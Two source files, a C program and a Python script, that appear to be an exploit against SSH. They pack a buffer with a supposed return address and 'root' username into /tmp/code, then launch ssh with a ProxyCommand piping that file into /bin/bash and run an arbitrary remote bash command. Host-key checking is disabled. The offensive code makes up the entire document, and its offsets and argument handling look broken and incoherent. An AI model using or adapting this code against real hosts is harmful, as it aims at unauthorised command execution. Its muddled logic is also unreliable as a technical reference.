File: ssh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <bsd/string.h>

/* Path to modified ssh */
#define PATH_SSH "./ssh"

int main(int argc, char *argv[])
{
    int f;
    int port;
    unsigned long *ptr;
    char *buffer, *ssh, *username, *bash_command;
    int i, username_length, packet_length, buffer_size;
    
    if (argc < 7)
    {
        printf("\nUsage: <count> <username> <host> <port> <h(i)> <bash command>\n");
        fflush(stdout);
        exit(0);
    }

    port = atoi(argv[4]);
    username = argv[2];
    username_length = strlen(username);
    buffer_size = ((username_length + 8) & ~7) + 40; // Calculate buffer size
    packet_length = buffer_size - 8; // Calculate packet length
    buffer = (char *) calloc(buffer_size, sizeof(char));
    
    if (buffer == NULL) {
        printf("\nError: Failed to allocate memory.\n");
        fflush(stdout);
        exit(1);
    }
    
    ptr = (unsigned long *) buffer;
    *(ptr++) = 0;
    *(ptr++) = 0;
    *(ptr++) = strtoul(argv[5], 0, 10);
    *(ptr++) = 0;
    *(ptr++) = 16520 + strtoul(argv[1], 0, 10);
    *(ptr++) = username_length;
    *(ptr++) = 0;
    
    for (i = 0; i < buffer_size; i += 4)
    {
        char* aux = buffer + i;
        char ch = *aux;
        *aux = *(aux + 3);
        *(aux + 3) = ch;
        ch = *(aux + 1);
        *(aux + 1) = *(aux + 2);
        *(aux + 2) = ch;
    }
    
    printf("\nUsername: %s\n", username);
    printf("\nBuffer Size: %d", buffer_size);
    printf("\nReturn Address: %p", (void *)(buffer + buffer_size - 4));
    fflush(stdout);
    
    f = open("/tmp/code", O_RDWR | O_CREAT, S_IRWXU);
    if (f < 0) {
        printf("\nError opening file\n");
        fflush(stdout);
        exit(1);
    }
    int bytes_written = write(f, buffer, packet_length);
    if (bytes_written < 0) {
        printf("\nError writing to file\n");
        fflush(stdout);
        exit(1);
    }
    close(f);
    
    bash_command = argv[6];
    int ssh_size = strlen(argv[0]) + 100 + strlen(bash_command) + strlen(argv[3]);
    ssh = (char *) calloc(ssh_size, sizeof(char));
    
    if (ssh == NULL) {
        printf("\nError: Failed to allocate memory.\n");
        fflush(stdout);
        exit(1);
    }
    
    strlcpy(ssh, argv[0], ssh_size);
    strlcat(ssh, " -p ", ssh_size);
    strlcat(ssh, argv[4], ssh_size);
    strlcat(ssh, " ", ssh_size);
    strlcat(ssh, username, ssh_size);
    strlcat(ssh, "@", ssh_size);
    strlcat(ssh, argv[3], ssh_size);
    strlcat(ssh, " '", ssh_size);
    strlcat(ssh, argv[0], ssh_size);
    strlcat(ssh, "' -o 'ProxyCommand=cat ", ssh_size);
    strlcat(ssh, "/tmp/code", ssh_size);
    strlcat(ssh, "| /usr/bin/tail -c +129 | /bin/bash'", ssh_size);

    system(ssh);

    return 0;
}

File: ssh.py
#!/usr/bin/env python3

import os
import sys
import struct
import subprocess

def get_buffer(count, username_length, command):
    buffer_format = "<7I{}sB{}sB3s".format(username_length, len(command))
    buffer_size = struct.calcsize(buffer_format)
    buffer = bytearray(buffer_size)
    ptr = list(struct.unpack_from("<7I", buffer))

    ptr[0] = 1543007393 + count
    ptr[2] = 0
    ptr[4] = 16520 + count
    ptr[5] = len(command)
    ptr[6] = username_length

    username_offset = struct.calcsize("<7I")
    command_offset = username_offset + username_length + 1
    padding_offset = command_offset + len(command) + 1

    struct.pack_into(buffer_format, buffer, 0, *ptr, b"root", 0, command.encode(), 0, b"\x90\x90\x90")
    return buffer

def main(count, username_length, host, port, bash_command):
    hi = count % 256
    buffer = get_buffer(count, username_length, bash_command)

#    print("\nSaved Eip: &h + {}".format(1543007393 + count))
#    print("\nReturn Address: 0x{:x}".format((16520 + count)//8))
#    print("\nPacket Length: {}".format((len(bash_command) + username_length + 2 + 3) & ~7))
#    print("\nUsername Length: {}\n\n".format(username_length))

    with open("/tmp/code", "wb") as f:
        f.write(buffer)

    ssh_cmd = ['/usr/bin/ssh.bak', '-p', str(port), '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-l', 'ubuntu', host, bash_command]
    output = subprocess.check_output(ssh_cmd)

    print(output.decode())
    sys.exit(0)

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("\nUsage: {} <count> <username length> <host> <port> <bash command>\n\n".format(sys.argv[0]))
        sys.exit(0)
    count = int(sys.argv[1])
    username_length = int(sys.argv[2])
    host = sys.argv[3]
    port = int(sys.argv[4])
    bash_command = sys.argv[5]
    main(count, username_length, host, port, bash_command)
